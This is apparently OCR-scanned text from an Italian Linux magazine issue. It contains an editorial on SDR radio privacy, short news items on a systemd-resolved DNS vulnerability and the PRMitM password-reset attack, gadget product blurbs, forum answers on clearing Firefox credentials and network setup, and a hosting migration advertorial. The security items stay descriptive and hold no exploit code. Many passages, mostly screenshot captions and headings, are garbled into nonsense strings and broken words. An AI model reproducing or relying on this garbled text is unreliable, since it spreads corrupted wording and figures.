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Non esiste solo Internet 


Che la privacy sia un qualcosa da 
difendere coi denti è noto a molti di 
noi. Così come sono molti di noi quelli 
che pensano che l'unico posto in cui 
la nostra sicurezza è messa a repen- 
taglio sia il Web. Certo, la Grande Rete 
è quel luogo, virtuale, dove ci esponia- 
mo maggiormente ai pericoli dell'era 
digitale (furti d'identità in primis) ma, 
purtroppo, non è l'unico. Spesso, infatti, 
mossi da questa convinzione, dimen- 
tichiamo alcuni dettagli fondamentali 
ed effettuiamo azioni con molta meno 
prudenza di quanto ne possa servire. 
Un esempio? Proviamo per un attimo 
a pensare quand'è stata l'ultima volta 
che abbiamo utilizzato il bancomat per 
pagare in un negozio della nostra città; 
ci siamo mica guardati prima attorno 
per verificare se una telecamera di sor- 
veglianza stesse riprendendo le nostre 


| mani? Certo, c'è sempre la buona fede 


dell'esercente, che sicuramente ha 
piazzato quella telecamera per garan- 
tire l'incolumità nostra e dei lavoratori, 
ma è anche vero che se qualcuno in 
grado di visualizzare le registrazio- 

ni video fosse in grado di entrare in 
possesso della nostra preziosa carta, 
per noi le cose si metterebbero davvero 
male. Ed abbiamo fatto solo un bana- 
lissimo esempio. Con questo, però, non 
vogliamo di certo fare dell'allarmismo e 


lungi da noi accendere strani dubbi. No- 
gliamo solo far aprire gli occhi, facendo | 


capire a chi ancora non l'abbia fatto 
quanto sia necessario stare sempre in 
guardia, non solo quando stiamo più o 


meno allegramente navigando sul Web. 


| pericoli sono dappertutto, frase vera. 
nella realtà e ancor di più quando si ha 
a che fare con transazioni bancarie 0 
tecnologia in generale. Mentre leggia- 
mo le pagine di questa rivista, proprio 
sopra le nostre teste stanno circolando 
tonnellate di comunicazioni. Alcune di 
queste sono criptate (anche se abbia- 
mo avuto più volte modo di scoprire 
quanto questo non sia un problema 
per un pirata ben attrezzato), altre no. 


| E se qualcuno sta pensando che ci 


riferiamo al Wi-Fi si sbaglia di grosso. 


Ci stiamo riferendo all'etere, da sempre 
utilizzato per trasmettere informazioni 
sotto forma di onde elettromagnetiche. 
Qualcuno conoscerà sicuramente i 
cosiddetti “baracchini”, delle stazioni | 
ricetrasmittenti utilizzate negli anni 
d'oro dell'epoca radioamatoriale per 

le comunicazioni CB, tecnicamente la 
banda cittadina. Bene, quelli sono solo 


. un esempio di metodi a disposizione 


per comunicare senza necessaria- 
mente far uso di Internet. E l'errore più 
grande è pensare che le trasmissioni 
radio, terrestri o satellitari, siano un 
concetto che sa un po' di vecchio. Ad 
oggi, sono il mezzo di comunicazione. 


più utilizzato dalle forze dell'ordine (non 


solo italiane, ma di tutto il mondo) e in 
casi di eventi spiacevoli come le calami- 
tà naturali. Vengono inoltre utilizzate per 
trasmettere e ricevere dati meteorolo- 


gici, perle ‘comunicazioni aeroportuali 


e, ovviamente, dai radioamatori, coloro 
i quali forse per primi conobbero il con- 
cetto di “chat”. Banalmente, poi, anche 
per aprire il cancello di casa 0, per chi 
‘ancora non ci fosse arrivato, per parlare 
al telefonino. Ma, com'è giusto che 


| sia, il progresso fa passi da gigante e, 


invece di abbandonare le comunicazioni 
radio (sarebbe da pazzi farlo), c'è chi ha 
incominciato a lavorare ad una nuova 


| tecnologia: SDR. Acronimo di Software 
| Defined Radio, sdogana il concetto di 


radiotrasmettitore, Mentre prima era 
necessario togliere di tasca cifre non 
indifferenti per acquistare un apparec- 
chio (hardware) in grado di ricevere e 
trasmettere su particolari bande, ‘oggi 
è quasi tutto demandato al software. 
Basta acquistare hardware da poche 
decine di euro per avere in casa una 
“macchina infernale” capace di captare 


tutto ciò che sfreccia nell'etere: ed ecco, 


dunque, che anche le comunicazioni 
delle forze nell'ordine, ad esempio, non 
sono poi così tanto riservate. Almeno 
per le orecchie del pirata di turno. 


Vincenzo Cosentino 
Invia il tuo commento a: 
linuxmag@edmaster.it 
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| nostri esperti ti spiegano passo-passo come tenere sempre sotto 
controllo server, reti e risorse hardware... e in caso di crash, ti avvisa! 


CONDIVIDI NELLA LAN LA TUA STAMPANTE 


4 


SCUREZA reni nni nn 
ATTACCO DHCP: IL PROTOCOLLO NON E SICURO! 
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Systemd vulnerabile ad attacchi DNS 


Un server malevolo può effettuare un attacco di buffer overflow 


MMI Una nuova vulnerabilità è 
stata scoperta nel sistema di 
init Systemd: un server DNS 
malevolo può sfruttare un erro- 
re nell'allocazione di un buffer 
in systemd-resolved per scri- 
vere dati arbitrari in memoria, 
causando il crash del software 
o,. potenzialmente, eseguire 
comandi arbitrari con privile- 
gi elevati. La funzione affetta è 
dns_packet new di resolved, 
che può essere attaccata da un 
server DNS malevolo tramite 
una risposta DNS appositamen- 
te costruita, provocando l'allo- 
cazione di un buffer più piccolo 
del necessario. Il bug si verifica 
a causa di un errore nel calco- 
lo della lunghezza della zona 
di memoria da allocare, che 
restituisce valori troppo piccoli 


quando la grandezza della ri- 
sposta DNS è prossima al valore 
massimo ammesso per la gran- 
dezza del pacchetto UDP (MTU 
dichiarato sull'interfaccia 
meno la dimensione degli 
header IP e UDP). 

Tra le distribuzioni GNU/ 
Linux. coinvolte  annove- 
riamo Ubuntu (nelle ver- 
sioni 16.10 e 17.04), Debian 
(Sid, Stretch e Buster, sebbene 
in Stretch systemd-resolved sia 
disabilitato di default). 
Canonical, che ha assegnato un 
livello elevato alla vulnerabilità, 
ha segnalato la presenza del- 
la patch per la risoluzione del 
problema nella Ubuntu Security 
Notice 3341-1; anche Debian ha 
pubblicato un proprio bollettino. 
Red Hat Enterprise Linux e Cen- 


tOS non sono vulnerabili, men- 
tre per Fedora è stato rilasciato 
un aggiornamento, 


Per informazioni: 
www.edmaster.it/url/6926 


Maxi sequestro di IPTV illegali 


Chiusi 9 siti e sequestrati 89 server che trasmettevano i canali Sky e Mediaset 


BM Le fiamme gialle hanno 
chiuso 9 portali che of- 
frivano in maniera 
abusiva e a prezzi 
stracciati accesso 

ai contenuti au- 

diovisivi dei pa- 

linsesti pay-per- 

view di Mediaset 
Premium e Sky. 
L'operazione, nome 
in codice Pirate on De- 
mand, condotta dal nucleo 
di Polizia Tributaria della Guardia 


di Finanza di Cagliari è iniziata nel settembre 
del 2016 ha portato al sequestro di 89 server utiliz- 


Internet Protocol 
_deysion 


tenuti tramite IPTV: 


dividuati come l'origine della 
diffusione. Per farlo han- 
no dovuto analizzare 
una consistente 
» mole di dati scam- 
\ biati tra Internet 
l Service Provider, 
uploader e utenti 
finali e a individua- 
re le informazioni 
di reale interesse ri- 
spetto alle indagini. | 9 
portali, oscurati tramite 
richieta ai provider, ren- 
devano disponibili i con- 
chi si abbonava, ad un 


zati per alimentare i siti Internet incriminati. 

A collaborare con le forze dell'ordine anche le uni- 
tà anti-pirateria di Sky e Mediaset che hanno reso 
possibile lo sfruttamento in sede di indagine della 
tecnologia digital content protection e della firma 
presente nei video: proprio seguendo queste trac- 


* ce le autorità sono riuscite a risalire ad una serie di 


indirizzi IP e siti Internet ricorrenti che sono stati in- 


cifra considerevolmente più bassa rispetto all'of- 
ferta regolare delle due emittenti poteva accedere 
ai relativi contenuti piratati sia in modalità live stre- 
aming dei canali trasmessi, sia on demand, ovvero 
con una raccolta dei contenuti offerti su richiesta. 


Per informazioni: 
www.edmaster.it/url/6927 


PRMitM: l’attacco che fa tremare il Web . 


Con questa nuova tecnica, non c’è password robusta che tenga 


BI Alcuni ricercatori del College of Manage- 
ment Academic Studies, il più grande ateneo 
dello Stato di Israele, hanno recentemente pub- 
blicato un articolo nel quale viene illustrata una 
nuova tecnica di social engineering consistente 
nell'applicazione dell'approccio man-in-the- 
middle per violare i meccanismi a disposizio- 
ne dell'utente per il recupero delle password. 
L'attacco, chiamato PRMitM (Password Reset 
Man in the Middle), risulta semplice nel con- 
cetto ma elaborato nell'applicazione, e preve- 
de l'utilizzo di apposite piattaforme di backend 
in grado di assumere il ruolo di intermediario 
nell'operazione di ripristino della password di- 
menticata in molte piattaforme e applicazioni 
Web. CAPTCHA, domande di sicurezza, codici di 
verifica via SMS o autenticazione a due fatto- 


tramite un sito Web per il quale un utente effet- 
tua l'iscrizione, magari per effettuare l’accesso 
ad un'area riservata o al download di file. Nel 
momento in cui l’ignara vittima specifica il pro- 
prio indirizzo di posta elettronica può iniziare 
l'attacco vero e proprio: a questo punto infatti, 
l'attaccante può avviare la procedura di recu- 
pero password e chiedere all'utente qualunque 
informazione necessaria a portare a termine 
l'operazione, proponendo di compilare le rispo- 
ste segrete relative alle stesse domande 
configurate per l'account 
vittima, o chiedendo altri 
dettagli necessari. 


Per informazioni: 
www.edmaster.it/url/6928 


ri non sono un ostacolo per l'attaccante: la 
richiesta per l'informazione eventualmen- 
te necessaria viene inoltrata alla vittima; 
per tale ragione la piattaforma utilizzata 
nell'attacco deve integrarsi appieno con 
il servizio target. Uno degli scenari di at- 
tacco presentati è effettuato, ad esempio, 


Facebook: Aquila vola verso il successo 


Dispiegate ancora una volta le ali del drone che porterà Internet nelle aree remote 


MMI La nuova missione di Fa- 
cebook punta a collegare le 
persone in maniera facile. Per 
farlo, oltre a dotarsi di nuovi 
strumenti come la possibilità 
di creare community, intende 


consentire a chiunque nel mon- 
do di collegarsi ad Internet: Il 
progetto di Zuckerberg ricorda 
Project Loon di Google e punta a 


irradiare con ilWi-Fi le aree re- 
mote del pianeta con l'ausilio di 
droni solari. Come rende noto 
la stessa Facebook il secondo 
volo sperimentale del drone 
prototipo chiamato Aquila si è 
concluso con. suc- 
cesso. Il drone è in 
grado di decollare a 


una velocità di poco 
superiore ai 40 Km/h 
e tutti i suoi movi- 
menti appaiono par- 
ticolarmente lenti e 
delicati: “Aquila non 
fa nulla velocemen- 


te, decolla. piano, 
scende dolcemente 
e quando vola si muovetrai16 e 
i 24 Km/h. L'abbiamo progetta- 
to in questo modo perché Aqui- 
la deve stare in volo per lunghi 


periodi di tempo al fine di forni- 
re l'accesso ad Internet. Aqui- 
la funziona ad energia solare 
con. un'elevatissima efficienza 
consumando l'equivalente di 3 
asciugacapelli”. L'ultimo volo 
ha avuto lo scopo di recuperare 
dati utili a migliorare il proget- 
to, ma anche mostrare di aver 
imparato dagli errori. Uno dei 
punti più importanti su cui gli 
ingegneri si sono concentra- 
ti riguarda il comportamento 
dell'apparecchio in volo e sotto 
sollecitazioni ambientali. Un at- 
tento studio può infatti permet- 
tere di ottimizzare al massimo 
l'assorbimento energetico evi- 
tando inutili sprechi. 


Per informazioni: 
www,edmaster.it/url/6929 


| Google ha annuncia 
| star sperimentando un 


Periferiche, accessori e altri dispositivi per lavorare e divertirsi nel tempo libero 
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TO OR STIA 


IL TELEFONINO IMPERMEABILE 


CUSTODIA DA SPIAGGIA IMPERMEABILE PER SMARTPHONE 
Se gli smartphone top di gamma sono quasi tutti im- 
permeabili, lo stesso non lo si può dire per i telefonini di 
fascia media e bassa. Se vogliamo portare lo smartphone 
in piscina o al mare, 
ma vogliamo evitare 
che l'acqua possa 
danneggiarlo, una 
custodia impermeabi- 


le è perfetta! È infatti» + 

in grado di proteggere .. © @ 
il device da sabbia, 
polvere è, ovviamente ‘# 
acqua (fino a 10 (A o, 
di profondità). I Vani 

STAM PA SENZA FILI! Per informazioni: dl 

umwwedmastehii. >, Ù, 

Se vogliamo stampare in comodità, senza aver a che fare con cavi url/6936 Pa 0 

USB o Ethernet, questa stampante multifunzione è ciò che fa per W& n°) 

noi. Grazie all'interfaccia Wi-Fi integrata, potremo stampare con 

facilità da smartphone, tablet e, ovviamente, anche da PC. La 

qualità è perfetta anche per stampare fotografie nel formato 10x15 

cm o 13x18 cm: per la carta fotografica è presente un vassoio 

separato e ciò ci consente di non cambiare carta ogniqualvolta 

vorremo stampare una foto o un documento. 

Per informazioni: www.edmaster.it/url/6932 


IL CAVO SUPER 


UN CARICATORE, RESISTENTE 


4 DISPOSITIVI 


CAVO MICRO USB GUAINA 
TECHLY CARICATORE INTRECCIATA USB 2.0 
USB 4 PORTE 2,5A Se siamo alla ricerca di un cavo 


Abbiamo diversi di- 
spositivi da caricare 
simultaneamente? 
Dopotutto, molti di 

noi hanno almeno 

uno smartphone e un 
tablet, ma c'è anche 
chi, per lavoro o per 
altri motivi, si ritrova 
con più di un telefoni- 
no. Grazie a questo ca- 
ricabatterie, potremo dire addio a mille adattatori. 
da portare sempre in giro: un solo caricatore per 4 
diversi dispositivi. La porta 1, di colorazione rossa, 
supporta la carica fino a 2.4 A. 

Per informazioni: www.edmaster.it/ur]/6935 


USB per caricare il nostro smar- 
tphone o tablet che sia super 
resistente e che non si ingarbugli 
con facilità, questo è la soluzio- 
ne perfetta. Dalla lunghezza di 1 
metro, segue lo standard USB 
2.0, tipo A maschio da un 
lato e Micro B maschio 
dall'altro. La colorazio- 
ne blu con i connettori 
arancioni lo distinguo- 
no ancor di più dal 
“solito” cayo USB. 
Per informazioni: 
www.edmaster.it/url/6939 
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hi-tech per tutti 


SRP PNPRSSARPIEZRI FRITTATA TI 


IL MINI TREPPIEDE 


Dalle dimensioni estre- 
mamente compatte 

è perfetto per essere 
portato sempre in giro 
nel taschino, pronto per 
essere utilizzato all'oc- 
correnza: un selfie di 
gruppo o un paesaggio 
da immortalare con il 
nostro fedele smartphone Android. 
Grazie alla possibilità di essere 
ruotato di 360° in orizzontale e 90° 
in verticale è perfetto per realizza- 
re foto panoramiche o per registra- 
re video in qualsiasi circostanza. 
Per informazioni: 


www.edmaster.it/url/6934 
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ibi 
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NON IL SOLITO ROUTER 


MODEM ROUTER TENDA 
DUALBAND 1200 MBPS 


Velocità, design e multimedialità: sono le pa- 
role chiave che identificano questo modem 
router Tenda, ideale per chi cerca solo il me- 
glio senza però dover togliere di tasca cifre 
esorbitanti. Le due antenne esterne da 7dB 
garantiscono un raggio d'azione molto eleva- 
to e la wireless a 1200 Mbps lo rende perfetto 
per chi ha necessità di scaricare sempre alla 
massima potenza. Non manca una porta 
USB per la condivisione di file in rete. 

Per informazioni: 
www.edmaster.it/url/6933 


IL MOUSE PERFETTO 


Ogni utente smanettone desidera un mouse affidabile, preciso 

e, nel caso delle soluzioni senza fili, con una durata della batte- 
ria sufficiente. Il Marathon M705 di Logitech è una garanzia: la 
batteria offre un'autonomia di 3 anni e lo scorrimento ultra-veloce 
lo rendono perfetto per gli utilizzatori più incalliti. Il tracciamento 
laser offre una perfetta precisione su qualsiasi tipo di superficie. 
Per informazioni: www.edmaster.it/url/6938 
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IL GUARDIANO DIGITALE 


La sicurezza non è mai troppa 
ed avere un occhio digita- 
le che vigili sempre sui 
nostri spazi più impor- 
tanti (casa, giardino, 
ufficio, ecc.) è ormai 

una prerogativa di 

molti. Questa piccola 

IP Camooffre sia la 
connettività cablata 
(Ethernet) che senza 

fili (Wi-Fi). La sua 
configurazione è im- 
mediata e ci permet- 

te di visualizzare le 
immagini riprese dalla 
telecamera anche da 
smartphone Android. Pre- 
senti anche i LED infrarossi 
per la visione notturna. 
Per informazioni: 
www.edmaster.it/url/6937 
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. DAL FORUM LINUX-MAGAZINE.EDMASTER.IT 


SOLUZIONI DAL FORUM 


Ogni mese i thread più gettonati estratti nelle d 


iverse discussioni dal forum di GNU/Linux 


Magazine. Se non fate ancora parte della nostra squadra, iscrivetevi subito e contribuite 
alla crescita del movimento Open Source. Il nostro sito è pronto ad ospitare esperti, neofiti 


o semplicemente chi ne vuole sapere di più a p 


Sistema/Sicurezza 


FIREFOX: CRONOLOGIA, PASSWORD E COOKIE 


DOMANDA ®@ Sto lavorando su un computer che devo dare ad altri 
e, mentre provavo l'accesso ad un sito con Firefox, ho memorizzato la 
password. Come cancello le password memorizzate? 


SOLUZIONE ® Larichiestadell’utenteSargon6haun’immediata soluzione 
tramite la procedura che segue. Premiamo il tasto Alt per far apparire i 
menu in alto e da Modifica optiamo per Preferenze. Alternativamente, a 
destra nella barra delle icone, possiamo cliccare sull’icona con tre strisce 
orizzontali e dal pannello contestuale optare per Preferenze. Giunti a questo 
punto dall’elenco di sinistra scegliamo Sicurezza. Se vogliamo evitare 
questa trafila abbiamo a disposizione una terza strada, scrivere nella barra 
degli indirizzi direttamente la stringa about:preferences#security (Fig. 
1). Ora, dalla schermata principale, nel pannello di destra, nella sezione 
Accessi clicchiamo sul pulsante Accessi Salvati. Verrà aperta una pop-up 
omonima nella quale cliccare su Rimuovi tutto. È utile sapere che durante 


roposito di GNU/Linux e del Software Libero 


il normale uso del browser vengono registrati altri file come i cookie di 
navigazione, la cronologia, gli accessi effettuati, i file temporanei in cache, 
ecc. Allora, sempre in Preferenze dirigiamoci questa volta su Privacy 
(alternativamente, come il caso precedente, è possibile digitare nella barra 
degli indirizzi la stringa about:preferences#privacy). Nella sezione 
Cronologia clicchiamo su cancellare la cronologia recente. Nella nuova 
pop-up (Fig. 2) selezioniamo tutto nel menu a tendina Intervallo di tempo 
da cancellare e assicuriamoci che in Dettagli siano spuntate tutte le caselle 
presenti. A questo punto, clicchiamo su Cancella adesso per cancellare tutti 
i tipi di file elencati. Aggiungiamo, infine, un ulteriore suggerimento oltre 
a quelli riportati nel forum. Quando lanciamo da utente (amministratore o 
meno che sia) il browser Firefox questo andrà a creare nella home dell'utente 
che lo ha lanciato, una cartella nascosta di nome .mozilla. In questi casi, 
dovendo consegnare il computer a terzi, sarebbe opportuno rimuovere 
completamente tale cartella. Ciò non creerà alcun problema (a meno di 
aver installato qualche estensione in genere memorizzata in tale cartella): 
è evidente come al nuovo lancio di Firefox la cartella verrà nuovamente 
ricreata. Infine, per coloro che volessero conoscere il significato di ogni 


(© firefox | about:preferences#security Le cera Je 


Sicurezza 


Generale 


V| Avvisa se un sito cerca di installare un 


[3 


componente aggiuntivo Eccezioni... 


V| Blocca contenuti a rischio e ingannevoli 


V| Blocca downloada rischio 


vi Avvisain caso di software indesiderato e non scaricato abitualmente 


Accessi 


wi Ricordale credenziali di accesso al siti 


Utilizza una password principale 


Fig. 1 » Nella sezione Sicurezza vi sono gli accessi salvati in Firefox 
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Eccezionf... 


Cambia la password principale... 


Cancella tutta la cronologia 


Intervallo di tempo da cancellare: |» tutto | 


Tutta la cronologia verrà eliminata. 
Questa operazione non può essere annullata. 


+ | Dettagli 


() cronologia navigazione e download 
|) Modul e ricerche 

{BE) cookie 

|} Cache 

[18] Accessi effettuati 

(È) Dati non In linea del siti web, 

[) Preferenze del siti web 


Cancella adesso | Annulla 


Fig. 2 * Per la propria privacy è meglio cancellare cronologia, 
inclusa quella dei download effettuati 


singola opzione presente nelle sezioni indicate, possiamo notare (anche 
dalle immagini presenti) come in alto a destra sia presente un piccolo punto 
interrogativo: cliccando su di esso, con rete attiva, si verrà rediretti all’help 
(in italiano) su quella data sezione alla fondazione Mozilla dove sono 
spiegate puntualmente tutte le voci. 


Sistema/Networking 
CONFIGURAZIONE SCHEDA DI RETE 


DOMANDA ® Salve a tutti. Ho un piccolo problema: all'avvio della 
distribuzione l’inizializzazione della scheda di rete, identificata con eth0 
dal comando ifconfig (man ifconfig), da come risultato nei log un misero 
“fallito”. Se provo, però, ad attivarla dal Centro di Controllo viene 
regolarmente riconosciuta e la configurazione, che effettuo ogni volta al 
termine del boot della macchina, viene regolarmente accettata e mantenuta 
per tutta la sessione con l’indirizzo IP che fornisco durante la dinamica di 
configurazione. Domanda: come posso evitare questa procedura ad ogni 
avvio? 


SOLUZIONE ® La domanda è formulata dall’utente attack_the_king 
e dopo alcuni suggerimenti lo stesso utente riporta la soluzione che vede 
la disabilitazione dell’attivazione automatica della LAN al boot della 
distribuzione. Lo stesso utente non fornisce, però, né la distribuzione in uso, 
non riporta se avesse o meno un client dhcp attivato sulla distribuzione e 
nemmeno se sul modem/router in uso vi fosse o meno un server DHCPattivo. 
Infatti in tutti i moderni router (ad esempio il modello visibile in Fig. 3, ma 
ve ne sono una grande quantità di marche e modelli differenti) è presente 
un server DHCP configurabile via browser collegandosi all’interfaccia Web 
del modem/router dopo aver inserito username e password: in genere un 
indirizzo del tipo 192.168.0.1, fare riferimento al manuale per lo specifico 
modello in uso, mentre i dati per il login sono in genere presenti sulla pancia 
del router su una etichetta adesiva. Il server DHCP integrato permette di 
assegnare un indirizzo IP al PC a esso connesso non appena il router stesso 
“sente” la presenza di una scheda di rete‘attiva su uno dei suoi connettori 
RJ45 Ethernet (da non confondere con il connettore RJ11 proveniente 
dalla linea telefonica). Infatti, ad esempio, in questo caso il problema 
potrebbe derivare da una errata configurazione del dhcp lato client o anche 
dall’impostazione di IP statici sul router che non collimano con quelli che 
vengono impostati automaticamente al boot della distribuzione. 

I casi di connessione a Internet più comuni, potremmo dire “domestiche”, 
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che si presentano sono essenzialmente due: 


- un collegamento diretto ad Internet attraverso un modem (non router) 
ADSL connesso direttamente al PC (USB o scheda di rete); 

- un collegamento in una rete locale tramite una scheda di rete Ethernet 
collegata ad un router. 


Nel primo caso è necessario fornire alcuni dati come indirizzo del DNS 
primario e secondario, username e password dell’utente che richiederà 
l’autenticazione presso il proprio provider. Ciò può essere attuato, ad 
esempio, previo uso delcomando pppoe-setup presente, insieme ai comandi 
pppoe-start per attivare la rete e pppoe-stop per chiudere la connessione, 
nel pacchetto rp-pppoe (protocollo PPPoE, Point-to-Point Protocol over 
Ethernet) che si appoggia al pacchetto ppp (per il protocollo PPP, Point- 
to-Point Protocol) che contiene il demone pppd (man pppd), comandi 
e demone che si preoccuperanno di assegnare l’indirizzo IP 
alla nostra macchina. Nel secondo scenario, 
oggi come oggi la stragrande maggioranza 
delle connessioni domestiche, le 
informazioni della rete in cui ci si trova 
riguardano l'indirizzo IP da assegnare 
alla macchina, la netmask e l'indirizzo 
del gateway (o router se ci troviamo 


3 Fig.3 
sul suo stesso segmento di rete). In Il router 
realtà se sulla rete è disponibile un NetGear 
server DHCP l'indirizzo non dovrà più modello 
essere specificato a mano ma verrà DGN 2200 
automaticamente impostato grazie a N300 


questo protocollo. Va da se che sul 
computer dovrà essere attivo un 
client DHCP, mentre il server sarà presente nel router 
(o su un altro PC avente tali funzioni) dove rimarrà in ascolto su una 
specifica porta (logica) in attesa di transazioni ad opera dei client che a esso 
vorranno collegarsi. Osserviamo che qualora si volesse creare una propria 
rete locale la scelta degli indirizzi non potrà (e non dovrà) essere casuale: la 
buona pratica vuole che in questi casi è sempre opportuno scegliere indirizzi 
appartenenti a classi riservate per tali scopi e assegnati ad-hoc dallo IANA 
(Internet Assigned Numbers Authority — www.iana.org), indirizzi che 
non vengono mai assegnati a macchine pubbliche su Internet. Infatti il 
documento RFC 1918 (www.ietf.0rg/rfc/rfc1918.tx%) al capitolo 3 Private 
Address Space elenca, su indicazioni dello IANA, una serie di indirizzi 
per le cosiddette reti private, ovvero reti interne ad una organizzazione che 
non devono mai essere connesse direttamente ad Internet. Tali indirizzi 
privati (riservati per tali scopi) vedono un intero subset nella classe A, 16 
reti di classe B e 256 reti di classe C, indirizzi che vengono riportati, per 
comodità del lettore, nella tabella sottostante: 


Intervallo indirizzi 


Menti 


172.16.0.0 — 172.31.255,255 


Naturalmente il riferimento nella tabella è agli indirizzi IPv4. Per 
completezza facciamo presente che parliamo diffusamente del protocollo 
DHC?P in questo stesso numero nella pagine dedicate alla sicurezza. 
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IL PIANO HOSTING 
GIUSTO PER TE 


Hosting Solutions ti offre ad un prezzo incredibile tutti 


gli strumenti per creare il tuo progetto online 


estreggiarsi tra la moltitudine di offerte online è 

davvero un’impresa: la concorrenza è spietata 
ed i provider che promettono l'impossibile abbonda- 
no. Ad aiutarti ci pensano Edizioni Master e Hosting 
Solutions, provider italiano attivo sulla scena IT da 
oltre un decennio, che ti propongono un piano hosting 
affidabile e performante ad un prezzo incredibile. Stia- 
mo parlando di Silver Linux, un servizio che mette a 


disposizione 100 GB di spazio su disco, 2 GB di 
spazio per i database MySQL, traffico Internet men- 
sile e banda illimitati, certificato SSL Let’s Encrypt 
ed un CMS preinstallato (a tua scelta tra WordPress, 
Joomla, Drupal, WooCommerce e PrestaShop). Se 
vuoi trasferire il tuo vecchio sito, database incluso, 
abbiamo preparato per te una guida che ti mostrerà 
in sintesi le varie operazioni da compiere. 


Hosting 
solutions 


out of the OX 


SCOPRI L'OFFERTA 
DI HOSTING SOLUTIONS 


I lettori delle riviste Edizioni Master 

| possono acquistare Silver Linux al 
solo costo del dominio per i primi 
12 mesi di utilizzo (invece dei 65€ + 
IVA di listino). Raggiungiamo la pa- 
ginaWeb www.edmaster.it/url/6940 
e, durante la procedura di finalizza- 
zione dell'ordine, utilizziamo il co- 
dice promozionale SLOTPDOM (può 
essere utilizzato solo una volta ed è 
valido fino al 31/12/2017). 


Fuori il vecchio, dentro il nuovo 


Trasferiamo un piano hosting nell’infrastruttura del provider italiano Hosting Solutions 


Los ren nr 


petaensiciazialaa 
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ACCESSO AL SERVIZIO 
0 Raggiungiamo la pagina Web www.edmaster.it/ 
url/6940 e inseriamo il nome del dominio da tra- 
sferire - come mostrato in figura. Clicchiamo poi su Ordina 
per avviare la procedura di acquisto del piano. 
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Nomefile. Dimensioi Tips file Ultima modifl Permessi . Proprietari 


Ultima modifica 


Nome file »___ Dimension Tipo tie 
d 


20/08/2017 15: Nessun server collegato 


test drupal cartelli 02/06/2017 1%... 

defautt.set.. 298 phodile 18/06/2017 16: 

drupaltà...  890.9KB pori 18/06/2017 15: 
a, 
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SERVE FILEZILLA 

Scarichiamo la versione di FileZilla compatibile con il no- 

stro 0S. Nelle due colonne è possibile sfogliare le cartel- 
le e visualizzare i file contenuti nella posizione corrente. La colonna 
sinistra è dedicata al computer locale mentre quella di destra al sito. 


Linux Magazine 


WII FOFISKBIO. VO. I LIAIIUDìI ci 

Indirizzo E-mail [sh igloo meno: situate ctu ai MÉ 

Consenso accessibilità Whois @ Si ©) No 

Ì Trasferisci successivamente 
® Avvia subito il trasferimento 


Trasferimento 


Server DNS © isat0NS di HostingSolutions 
‘® usa i miei DNS 


i 


3CPILEASE PESA LARE IAZIOLITIS TEMA EGIGS[EGILIRAISSIRtI DA GITOIIIIA0SONI&TISTII IO CIVILIFI DIGI IERIETADIOPBITASSRC SSIS CITI Sii Or I CATSNATT I RNIRANEITT ONTO TITATL] 
ATTENZIONE AI DNS 
0 In Dati Cliente vanno inseriti i dati dell'intestatario del 


dominio. Selezioniamo Avvia subito il trasferimento 
e usa i miei DNS (informazioni reperibili dal vecchio provider) in 
modo che gli utenti riescano sempre a raggiungere il nostro sito. 


Nome file Dimanzice Tigo file. Utena modifi Permessi. Proprietari 


)__ Ufkima modifica 


20/06/2017 15: 
O7/GG/2017 18 


Nessun server collegato 


i lcalcoesienda (aa talzidifi ti dazisaizte SERIO LGAICIGICEGAMISECITELIILITA LISTA ITA Fitici 
SPOSTIAMO | FILE ® 
0 Inseriamo indirizzo IP, credenziali e numero di porta (21). 


Clicchiamo su Connessione rapida. La procedura va ri- 
petuta due volte: la prima scaricando i file dal vecchio sito al PC. La 
seconda inserendo i dati FTP di Silver Linux e procedendo all'upload. 


Pochi clic e... il sito è trasferito! 


Effettuiamo un backup del vecchio DB ed importiamo tutto sul nuovo piano hosting 


È Database | LY soi: i, stato: # Esporta (i importa | dî Impostazioni (>) Variabi® | ME Setal 


Esportazione dei database dal server corrente in corso 


Metodo di esportazione; .._, 
@ Rapido - mostra solo le opzioni minime 
® Personalizzato - mostri tutte le possibi opzioni 
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BACKUP DEL VECCHIO DB 
01 Per esportare il vecchio database utilizzeremo la fun- 
zione Esporta di phpMyAdmin, localizzato solitamente 
nella sezione database del pannello di controllo. Dopo il login (cre- 
denziali del vecchio provider) andiamo nella sezione Esporta ed 
utilizziamo i settaggi in figura. Ecco il nostro file .SQL! 


phpMyAdmin 
PI POT di Batetnve, | Lo 308: Mx toto; 0 Ermete di Importa | gl Ammprstagioni. fr) Marino |, pl 6 canori. ii, Metent K 
Cinesi rece) È 
Ra amplia Importazione nel server corrente in corso [oi 
Rieti micemeeso chan | 
dea | 
Caca 54 tas compe {ii divontene rina CAMS È 
ldimaasi{ i Ì 
amporazone papale i 
af AR Te Pia A IT dI AVA Tn SCIA tc È KA 0 Fa PO Rem LA (Tia Song Dai 0 Ro avgort nego Rima desimnene d ca dread dano 7 IRÈ 
Tree i 
Fomato: I 
= È 


semo tai 


IMPORTIAMO IL DB 
0 Clicchiamo sull'icona di phpMyAdmin in corrispon- 
denza del database appena creato, effettuiamo il 
login e scegliamo Importa. Ora non resta che cliccare su cho- 
ose file, indicare il file .SQL precedentemente creato e dare 
conferma con Esegui. 


localhost 
vincosentux 


# The following lines are desirable for IPv6 capable hosts È 
Dos ip6-localhost ip6-loopback î 
fe0o::0 ip6-localnet è 
ffoo::0 ip6-mcastprefix 

ff02::1 ip6-allnodes li 
ffo2::2 ip6-allrouters Î 


ul REI ERRE RE RIE AE 
TEST DEL SITO 
05 Inseriamo l'indirizzo IP del nuovo sito, reperibile 
nella email di attivazione, nel formato XXX.XXX. 
XX.XXX; lasciamo uno spazio e digitiamo il dominio del sito, 
come mostrato in figura. Salviamo il file e visitiamo il portale 
da un qualsiasi browser per avviare la sessione di test. 


a{Blx | 
E] comes | crenicb | Datbusinie 
Pendente a e 
= prioni freroa 

uf So 
ii vere Airone PIP 


panna 


Spar dico | tai tano 


Evenoa disney SOL par evo (7 ui poni) 


UN NUOVO DB 
02 Accediamo al pannello di controllo Hosting Solutions 
(Area Clienti). Da Hosting & Dedicati scegliamo Apri in 
corrispondenza di Silver Linux. Individuiamo ora la voce MySQL e 
dalla nuova sezione clicchiamo su Aggiungi per avviare la procedu- 
ra. È consigliato utilizzare il nome del vecchio database. 


pre { 


TE RIMONTA NPT affare renensevrimammozza s; 


IL FILE HOSTS 
04 Prima di indirizzare gli utenti sul nuovo sito dob- 
biamo accertarci che il portale sia funzionante. Per 
fare ciò dobbiamo modificare il file hosts [meglio effettuare 
il backup] aprendolo con un editor di testo. Il file è presente 
nella directory /etc. 


al-]|@]I 
U 
Gestione DNS. | Dati Dominio Cron Job Password 
Userc® 
